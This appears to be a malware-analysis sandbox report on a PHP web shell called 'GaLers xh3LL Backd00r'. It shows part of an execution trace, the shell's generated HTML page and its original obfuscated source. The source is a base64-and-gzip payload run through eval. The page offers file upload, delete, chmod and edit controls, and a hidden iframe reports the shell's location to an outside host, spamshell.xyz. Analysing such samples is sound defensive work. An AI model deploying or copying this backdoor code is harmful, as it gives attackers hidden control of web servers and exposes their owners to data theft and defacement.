4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 $perms = 33188
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 256 $info = '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 275 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 276 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 279 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 282 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 283 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 286 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 289 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 290 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 293 $info .= '-'
4 44 1 0.004079 472808
4 44 R '-rw-r--r--'
4 46 0 0.004094 472768 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/.htaccess'
4 46 1 0.004110 472808
4 46 R FALSE
4 47 0 0.004123 472768 is_readable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/.htaccess'
4 47 1 0.004140 472808
4 47 R TRUE
4 48 0 0.004154 472768 is_file 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 206 1 '/var/www/html/uploads/data'
4 48 1 0.004170 472808
4 48 R FALSE
4 49 0 0.004183 472776 is_file 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 206 1 '/var/www/html/uploads/galersshell.php'
4 49 1 0.004199 472824
4 49 R TRUE
4 50 0 0.004212 472784 filesize 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 207 1 '/var/www/html/uploads/galersshell.php'
4 50 1 0.004226 472824
4 50 R 4646
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 207 $size = 4.537109375
4 51 0 0.004252 472680 round 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 208 2 4.537109375 3
4 51 1 0.004266 472752
4 51 R 4.537
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 208 $size = 4.537
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 212 $size = '4.537 KB'
4 52 0 0.004304 472784 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 219 1 '/var/www/html/uploads/galersshell.php'
4 52 1 0.004321 472824
4 52 R FALSE
4 53 0 0.004334 472784 is_readable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 220 1 '/var/www/html/uploads/galersshell.php'
4 53 1 0.004349 472824
4 53 R TRUE
4 54 0 0.004363 472784 perms 1 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 221 1 '/var/www/html/uploads/galersshell.php'
5 55 0 0.004376 472784 fileperms 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 1 '/var/www/html/uploads/galersshell.php'
5 55 1 0.004390 472824
5 55 R 33204
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 $perms = 33204
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 256 $info = '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 275 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 276 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 279 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 282 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 283 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 286 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 289 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 290 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 293 $info .= '-'
4 54 1 0.004521 472824
4 54 R '-rw-rw-r--'
4 56 0 0.004535 472784 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/galersshell.php'
4 56 1 0.004551 472824
4 56 R FALSE
4 57 0 0.004564 472784 is_readable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/galersshell.php'
4 57 1 0.004580 472824
4 57 R TRUE
4 58 0 0.004594 472784 is_file 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 206 1 '/var/www/html/uploads/prepend.php'
4 58 1 0.004611 472824
4 58 R TRUE
4 59 0 0.004623 472784 filesize 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 207 1 '/var/www/html/uploads/prepend.php'
4 59 1 0.004641 472824
4 59 R 57
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 207 $size = 0.0556640625
4 60 0 0.004666 472680 round 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 208 2 0.0556640625 3
4 60 1 0.004681 472752
4 60 R 0.056
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 208 $size = 0.056
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 212 $size = '0.056 KB'
4 61 0 0.004718 472784 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 219 1 '/var/www/html/uploads/prepend.php'
4 61 1 0.004735 472824
4 61 R FALSE
4 62 0 0.004749 472784 is_readable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 220 1 '/var/www/html/uploads/prepend.php'
4 62 1 0.004765 472824
4 62 R TRUE
4 63 0 0.004778 472784 perms 1 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 221 1 '/var/www/html/uploads/prepend.php'
5 64 0 0.004792 472784 fileperms 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 1 '/var/www/html/uploads/prepend.php'
5 64 1 0.004806 472824
5 64 R 33261
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 $perms = 33261
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 256 $info = '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 275 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 276 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 279 $info .= 'x'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 282 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 283 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 286 $info .= 'x'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 289 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 290 $info .= '-'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 293 $info .= 'x'
4 63 1 0.004936 472824
4 63 R '-rwxr-xr-x'
4 65 0 0.004950 472784 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/prepend.php'
4 65 1 0.004967 472824
4 65 R FALSE
4 66 0 0.004980 472784 is_readable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/prepend.php'
4 66 1 0.004997 472824
4 66 R TRUE
3 19 1 0.005018 472832
2 7 1 0.005029 431176
1 3 1 0.005037 427880
0.005063 347048
TRACE END [2023-02-13 02:35:27.815297]
Generated HTML code
<html><head></head><body><iframe style="display:none; height: 0; width:0;" src="https://spamshell.xyz/write.php?get=http://localhost/galersshell.php"></iframe>
<link href="" rel="stylesheet" type="text/css">
<title>GaLers xh3LL Backd00r</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<h1><center>[#] GaLers xh3LL Backd00r [#] </center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file">
<input type="submit" value="upload">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/galersshell.php&path=/var/www/html">galersshell.php</a></td>
<td><center>4.537 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value=""></option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="galersshell.php">
<input type="hidden" name="path" value="/var/www/html/galersshell.php">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div><br>Mr. DellatioNx196 GaLers xh3LL Backd00r <font color="red">1.0</font>, Coded By <font color="red">Mr. DellatioNx196 - Bogor BlackHat</font>
</body></html>Original PHP code
<?php
$stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNz\x434pSi4upI5yUWJxqZhKfkpq\x63n5Kq\x41\x62SzKLVMQ6W4pMR\x41EwlY\x41w\x41\x3d";
$stt0 = "ds\x62ep6usxzowq2\x634dQKLm\x2by\x2bS\x62Hun6\x43R6iY2K7g3Fx\x63mdkYWdIlD7IQrdsLs9dI\x62u7xKlQsm887xqxNOs3xwO\x43Mu77Q3\x61H927egi7/n\x62UMy4w\x2bWxRw28Z\x61j9RmqJ3D\x41kr0FO2//L/RXUPQUHjLqV\x2bQdRxSqfDFV54r5kQ05qFu\x62Y\x2b50mTWq8sTH\x2bg1\x61Woxsm7ux1Hx97SR\x61ofV\x63DzFOfK\x42n/85D0S\x62dhrp1OodKQ0Ku\x41Dh\x41OrQJNO\x41Fr\x63M6tJOERoHP6\x42qK\x63IpWHhwlOHxWPhoKF0HpF\x43Umx\x61\x63EGW5YM\x62r\x42MVHSJ\x624zMkWjjQ\x2b\x61HjYrSD1l/\x42m\x62ER8y\x42L\x61SIXz\x62Qfx7QIrFVE1DIq1\x42\x2b61pwgZg\x639\x63RuIL\x62w\x4282T98jJ72ms/6LxXF5UWl\x61IVVfHjp\x2bJ0\x63Oys\x61eZy2IOS\x631Ify0mFlPLV82slEURsU4P\x41Twyzeo\x42vtEkodhNErgT\x63h58XUZyWr3U0W9vy/W4f0yo3XvvmH/Z\x2blQ\x61wSi2X4dPXWYrs50g\x63E3WKp\x2bQ/OZLueWFn2hrk\x632/ovFy39frQtzKihktR\x2bp/TWZd\x62plSrxmUeOtU\x43llQJE18zL\x2b8okeJDqhVtMlRDl\x63\x62f\x42S4z3FN2\x42seONvS\x61oVZLrPMvuiJHtO15yHh2\x434PTlYYNl7WrgSIPjF14Qz66fqytSyPmYSo\x42\x62vW1OZX4\x611RFOuY8h9K46iWyf\x41lke5HfIy1qPG4h5XhTqHXoNmqproZFH392Mk\x43VfFIenONTXFX6\x62/pLVz\x635tkNsrqTdZFp\x616Z0l0xKY4hvKYmRGslW\x42pY1vqhUS31GJ7J\x43E0\x2bUR2\x43\x63UZf\x41LvZKisV8kxhYVZk\x43vL11l\x42OM7w80k2qeyOF\x41yLzoM23Uy\x42k/yV7eyV11gKiQ0\x41R\x41L\x61\x42QFrG5XJhzqfV\x62fFlUYZ34hq1EW72WNGlPd\x61mrIJwOEfX\x42tGgguu\x61ZdFyXDMdj5NJuxz8QF\x62hRdmpRNWSgXN\x62w4pHM7Uo\x625ku\x42j7hlq15fk5NHWw2fZ\x61qlJnxS/\x2bOyULGOZxkOfS/QEI0/7\x62Ku9\x63uh8ts22F\x62vkp4\x62moUnJSZEzXV8yWPZ5gP/RSo82t70TUVMuYMnQRjs2Eg\x42SE1Is/379i\x42\x43phR14IhvsgXq38sLrqLkjesfLEKRS079L\x2bpVZD4qFY\x62eQu\x63\x41WinS/\x63xI\x2bnKo291UNJu1\x63LFUGU5EzgeLyh3Sd5rUfHOswfhS2gGImoGqw2YVXk\x631FV\x43\x430V\x4294W6d2ItV\x62pOr2zR/\x62OI\x2bLyfFPNwJ1NI\x625zTr2NDjF\x63vT\x41f\x2b\x41Nq\x2bEsNXgSN\x2b\x63W72kN1DrV\x42iXloRdFWOGWdHP/vFUwyqgK8Kr\x2bwpzYT03\x62\x42iq77JVyHWPZOGmKXX3P75prOo6lhnssKtYwiF8\x61fVf2S9\x61p8neVfNY7OQrEFl\x43VNeWWyKf3w\x61y80OFXL\x63WpIlXlqpTYTkji\x2bn4h\x41u3\x42S\x43\x2b\x61yiv\x61Nzg4p0wHQYtPe5FI\x62Fn\x43j\x63g0tppNyE9u41j/uwXQudPLfiLWP8ZKXT\x621XZ\x625ZglK7\x42DxdRM\x42UgD\x426\x41NdqVtX1MYkPu1g3pZ59\x62zWtpLV4j\x42uq5QeQQ2tSKu/\x423\x62\x43qz\x41ssr0t\x63RUYJNWDj18v\x615F9JzRTw3\x63P3v0Z\x42TIhRmFyHXnQP/Vo3pug41ofpJsQ5QLL\x63qDpoVmrTZzLK\x63\x2bjyUMQTO9gZ7lGvKrNIjq\x61\x2bJpIVWmppMJoxN0Oj0Y3QV\x42TJ0X\x434kqkUGZdkzjeGjuf3ml9mDRI7Xg\x42tSLh4Lx1goqNEi5J\x43Tieo\x41JFMrmE7wUrP\x62VSUIHQLeYrDl5g5FN2dq17nRGK\x62Kl6Z8tdPgmY\x41\x42zosqNJzrq5mjU\x42TyYdgRWQwme\x41qHMIprQYsV3eqF\x4330W\x43lQ6iyo\x62Ttylg6SkR\x63s6\x41dsI3ZHMZ\x61YxQI\x2bNfso8QwjpSxUWJSdD\x63\x43GM\x62L\x63nR\x41M\x61\x2b\x41rjl\x2b\x41\x62eHTJ\x63FwDj\x62LFWU\x2bgu0fy\x43dpZT/zwfkwXMwfJ5WDx1m\x41jxYvTyEGw9j2lzRh5xUxQi2Hjdjp5WRVSKN0\x63\x41wu52U\x2beMlKE6/t\x41ZWzefk5feY\x41zh6iHSp28\x62PT/3\x2b8xg2q7GU1MyG\x61\x41MJZgPmqlGJ\x61Kniz2zGt6SHZEWJR0\x619FkwyjgreDlzivi\x62DgiZqq\x42o/8w6\x41S9\x42dFxU7yhI1mGo\x41QI\x43YZDiWHOz\x63V\x61H\x43/EG9HK7r0VWovMHhT\x4165Z\x61F\x63t8OETXZ\x41PUvL\x42G\x2bjWoe8Opdk6QJ8uGQVTEesQSMSY\x63YJvUGq9oogUs4\x2bd/4QIw\x62ogygXmll\x62yKw\x4238VIKsSW\x43Whh8GZ\x42RT1HrxJ55gN4m\x41PRD\x61jILzQerQjm508h\x6340\x62tY/P\x61I5MIP\x41I\x2bmM7EjNTuZI36JSlGxq9W\x63m\x41IrKQ\x431x\x63xMR\x43HklnnsEk\x62oe1OeHTP\x41Hhh/hg0IuM\x63nli2gtJj/xSUyQ3HwQlMK\x41Fr01I\x42\x2bmyQhjyv/d0Ke3\x43ejXtmQGnpP9y/fMV6KyGZluFMQvV0IUtxGF49XMRe8vRnvN\x43yIWDHEoKpx34hV0\x61TwS\x41DZx\x2biKEUO\x2bqREOPHs\x61E9DHo0d\x62vKdHlTRmRXS4o\x42FpN\x63DfmN4xRYmITE\x43g3lhQISxQ3k/pL\x62q1nyZFPj5\x42xPmP\x62F0\x43mzp\x42Pxx\x42J\x2bY\x42NJrtzYR9SlrQt\x42Ki\x42\x43U\x42gQTl5IXz0n6kX/po\x42e3LHd8hXPGk\x43fPdl3n\x627jiwy4Wrgy4f2HF/HnK/\x2bwv1fE\x63/\x2bthr3G7\x42YN6RoM\x2bQ4fIp8tNKx8iI3uZU9ZwK\x41/RLHvioGjQUnGVO1k\x62\x4165h8U\x42iRWG\x62i0khIX0YssmrNRxjHP\x63j\x41Jk\x43h\x61\x611uN\x62j\x429hdZI567vfm\x62\x41n2Q4P2\x624sMh\x41w\x42DIiO\x62P4HsjnTM2\x42lZy\x41Gn0YIee\x43xQMUnvTk9IuEddj/9n2y7ev937Nvs4pJ\x62/3fu4qTv\x2biuz8Ml\x2bfk/LTwKpJodHU\x43gwvKwU\x42/OoP\x2b3O\x43UUGXGw\x63ty9iznjoMkYg0LP/0\x62G\x611r0EW5eY692/dtrV1HZO8\x42MmXH/1QEzQIXz\x414qM90fyV/M4y0ofLHkoXPKVNUXq\x43rQEzkPLMRIz\x43Y/QR3Ziqll6\x61v\x61q\x630MMmM6gqZ1FEDrffy70IZeMH\x42\x638/gF\x410u\x635oh\x41J5Y73uZMWITHYvZWNjZuMfYezdd\x62nkwP\x43wiZ7Q4kgR\x4344mGTXZ0I\x63H94fn915NL7ujvY8/fXj//65sxl557l9\x62O\x2b1VdN7\x2bT2\x2b/89emhUNRyyt\x63r5zwJx4wJY\x42qy92fv9PlL/PRHD/\x2bUPdPzzM1L\x62xRX/p2nZ\x43R\x41YR65627v3snFTDskIgZojSrkPxYdpkvdF1e3OnhjrQ8wrehDSL\x41VR\x43n4h/ri7\x2bL\x42S\x61PX\x62Z1u9xlgj\x42wJe2\x62W\x43ZGg9hlgn\x42wJe2\x62V\x43pGg9Rlgr\x42wJe2\x62U\x435Gg9\x42lgv\x42wJe";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>